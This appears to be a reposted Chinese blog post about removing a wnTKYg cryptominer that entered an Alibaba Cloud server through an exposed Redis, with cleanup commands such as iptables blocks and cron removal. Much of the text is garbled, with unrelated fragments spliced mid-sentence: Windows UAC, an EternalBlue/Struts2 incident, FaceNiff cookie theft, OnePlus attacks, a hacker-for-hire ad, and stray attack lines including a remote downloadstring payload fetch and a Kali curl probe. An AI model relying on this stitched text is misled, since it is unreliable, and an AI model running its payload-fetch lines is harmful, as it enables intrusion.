本年3月份的时分，因事务需求要在新购入的阿里云服务器上建立openresty+lua程序调用阿里云redis数据库，因为想便当检查redis的数据，顺便在服务器上设备的redis客户端。午饭后，想看一下openresty占用内存及cpu的情况。忽然发现cpu占用率居然达到了100%，而引起cpu 100%的是一个wnTKYg程序。

　　不明白wnTKYg是什么，上网百度了一下，这个居然是传说中的叫挖矿的程序，俗称挖矿机。心里凉了一下，竟被我遇上了。之一次遇上这个问题，直接找到这个程序的pid，就立刻kill了，在top的时分，这个程序居然又起来了，cpu占有率也仍是达到了100%。看来没找到问题的本源，再一次百度处理程序的办法。

　　其间看到了1篇和我遇上情况相同的文章。网上说的是redis的空子进来的，redid暗码太简略，端口6379未变。好了，要点说一下处理的办法。参照网上的处理办法：

　　封闭访问挖矿服务器的访问：iptables -I INPUT -s www.bdyutiudwj.com -j DROP;iptables -A OUTPUT -d www.bdyutiudwj.com -j DROP

　　找到minerd程序：find / -name wnTK这儿的find首要将尽或许多的文件名，把“{}”替换掉，每一个都作为自己的参数。这样写的话，不会有上面出现的换行符问题。但是怅惘的是，尽管它在POSIX里存在了好久，而最常用的GNU里，find很长一段时间里并不支撑“+”，所以它在实践运用中并不是很便当。合理的处理办法是编写一个针对“+”的支撑，在其顶用“；”代替“+”，这能够用来修补不支撑这类find的体系。

[1][2][3][4]黑客接单网

Yg*

　　去掉实行权限：chmod -xroot@kali:~/pentest# curl http://hackback.htb:6666/help wnTKYg

　　杀掉进程：pkill wnTKYg

　　铲除守时使命：在 /var/spool/cron 下的文件直接删去

　　铲除文件：除了opt下面的两个反常文件需求铲除，/tmp文件夹下也有文件需求铲除

　　因为服务器上仅仅redis客户端，我直接drop了，以绝后患，检查数据的话，直接登录阿里云的redis办理界面检查。

　　最终记住redis在生产上的配备一点要注重，暗码，端口，防火墙...

　　附上看到的一片博客，也是关于wnTKYg的问题。http://blog.sin *** .cn/s/blog_c08907b10102wyyl.html

　　内容如下：

　　杀wnTKYg病毒分两步，之一是找到它的来历，堵截进口，第二步，找到它的看护进程并杀死，然后再去杀死病毒进程，有的看护进程很荫蔽，唤醒病毒之后，主动消亡，这时分top就看不到了，要留神。

　　因为工作需求，我由一个专业java开发工程师，逐渐的也成为了不专业的资深的运维工程师了。最近项目在做功能测验，发现CPU运用率反常，无人访问时CPU也一向坚持75%，然后在xShell上top了一下，发现wnTKYg这个程序CPU占用率300%，

　　

　　很明显是病毒进程，下意识的把它kill了，但是一分钟之后又主动重启了，所以百度了一下，发现这个东西叫做挖矿工，简略的说，便是他人用你的服务器去做它自己的事，然后挣钱。

　　知道wnTKYg是什么鬼之后，我不急着杀死它，先百度了一下它怎样进来的，百度上关于它的帖子特别少，说是钻了redis的空子进来的，我基本上附和这个说法，之一步便是对redis进行了配备上的批改：

　　① 把默许的端口号6379给改了

　　② 把暗码改的更杂乱了

　　③ 把bind xx.xx.x.x xx.xx.xx.xx改了

　　批改redis是避免这熊孩子再进来，第二步便是把现已入驻的木马杀死，它不只运用我的服务器，它还登录我的账号，所以检查了/root/.ssh 下的文件，在/root/.ssh/known_hosts中发现了我不认识的IP，肯定有问题，所以爽性把 /root/.ssh 下的文件都删了，省劲了。

　　第三步便是要找到一切关于病毒的文件， 实行指令 find / -name wnTKYg*，只扩展感染有/tmp下有这个文件，删了，然后就去kill wnTKYg进程，你认为这样它就能够死了吗?Never!一分钟之后它又复活了，我猜想一定有看护进程在唤醒它，所以我再kill 然后top调查进行改变，总算被我发现了，有一个/tmp/ddg.1007进程很可疑，所以百度这个东东验证了一下，公然，便是挖矿工的看护进程，用ps -aux|grep ddg 指令把一切ddg进程找出来杀掉，并删去/tmp目录下的一切的对应ddg文件，至此，病毒被处理了，异地登录，安全扫描什么的也被我处理了。

　　许多哥们也遇到了这个问题，加了我老友，并且描述了他们的一些情况，我会把他们的改善和弥补也写在此贴里，有的哥们会有个守时使命下载这些东西，目录 /var/spool/cron，记住留心这个文件夹，假如遇到，就把它干掉。

　　安全问题仍然严峻，所以找了一家安用户帐户控制 (UAC) 给了我们运用标准的用户权限代替完全的办理员权限来工作程序的才华。所以即使您的标准用户帐户位于本地办理员组中，那么遭到的损坏也是有限的，如设备服务，驱动程序以及对安全方位实行写入操作，等等，这些行为都是被拒绝的。要进行这些操作，用户需求与桌面进行交互，如右键单击并以办理员身份工作或者是接受 UAC 进步的提示。Microsoft从 Windows Vista 起就引入了 UAC，它包括了许多的技术，其间包括文件体系和注册表虚拟化、保护办理员 (PA) 帐户、UAC 进步提示和 Windows 完整性等级。 全公司--安全狗咨询了下相关的安全事务，发现蛮贵的，都是万最初的，并且我也不知道他们水平怎样样，所以把我遇到的问题跟事务员说了，看看他们怎样处理，怎样收费，商洽了一下午，定价3500，没的再低了，哎，仍是我好，又为公司省了3500。

　　因为发了这篇帖子，一

近来，深信服安全团队接到安全感知报警提示内网某Linux中心Web服务器对内网其他服务器建议永久之蓝和Struts2缝隙侵犯等，报警主机被标记为已沦亡。通过安全专家排查发现服务器存在较大的安全隐患，侵犯者运用Web缝隙作为进口深化内网进行勘探，妄图盗取敏感数据。位和我情况差不多的网友也供应了一种处理方案，我把他的也贴进来与我们共享谢谢这位网友：首要封闭挖矿的服务器访问 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP

　　iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP 然后删去yam 文件 用find / -name yam查找yam 文件 之后 找到wnTKYg 地点目录 取消掉其权限 并删去 然后再取消掉 tmp 的权限并删去 之后 pkill wnTKYg就OK了。

　　假如觉得这篇文章对您起了协助，记住点赞加谈论，让更多人能够看到，问题能够快速的处理。

　　转载的话，记住注明出处，把我博客地址http://blog.sin *** .cn/pastlifezhangchilde贴上，谢谢

黑客技术网:一次阿里云服务被挖矿的阅历

现已看过的朋友，咱持

续。· /var/containers/Bundle/io *** inpack64：其他二进制文件和实用程序struct sockaddr_in addr; // client address一次阿里云服务被挖矿的经历

黑客技术网设备注册 正常基站https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/批改文件夹的时间特色可运用0x03中的FileTimeControl_WinAPI，能够批改以下三项内容：

------- ---------- -----------1）反省近来创立的php、jsp文件和上传目次黑客技术网

.downloadstring('http://192.168.100.3:8080/9Q21wiSds9E0pxi');在OnePlus 3/3T设备上，仅当Full Disk Encryption(FDE)未打开时物理侵犯向量才华正常作业。当然也能够对3/3T设备上的锁屏暗码进行侵犯，换句话说即设备为非安全发起的情况。至于中间人劫持侵犯向量是需求进行一些用户交互的，但是看起来与正常的OTA晋级没有一点点不同。 int32_t ut_session; /* Session ID (getsid(2)), {

if ($check=='check')补全信息7. 配备和杂项MS.hookClassLoad(“com.androidpentesting.targetapp.Login”, new MS.ClassLoadHook() {一次阿里云服务被挖矿的经历

黑客技术网不过呢，网上也有破解版的，但是不知道效果怎样样，小编没有亲自下载运用过破解版的，之前小编下载软件都是去官网下载的，而不是在一些什么软件站，因为这些软件站有时分会给你一些绑缚软件，或许批改一些原始原件的一些程序，可能会盗取个人信息什么的。（2）注册或购买一批苹果帐号，群发软件运用这些帐号来登录然后发送信息L2 Header + IP（外层）+ UDP

+ ESP + Payload（加密）

　　Shellshock

[1][2]黑客接单网

黑客技术网

　　但是，智能手机中的指纹辨认体系理应能够在供应了操作便当性的一同，也能保证用户的数据安全。本文我们要谈论在不需求内核缝隙的情况下，怎样运用“安全世界”的内存访问权限劫持“一般世界”中工作的Linux内核。FaceNiff是一款顶级Android黑客运用，容许我们阻挠并嗅探WiFi *** 流量。这款东西广泛适用于Android用户窥探他人的Facebook、Twitter以及其它外交媒体网站。这款在黑客团体中广受好评的东西能够从WiFi *** 中盗取cookie，并为侵犯者供应未经授权的、指向受害者账户的访问通道。一次阿里云服务被挖矿的经历

◆开发团队：KeePassX Team

RunTo(BeginEA())
本文标题:黑客技术网:一次阿里云服务被挖矿的阅历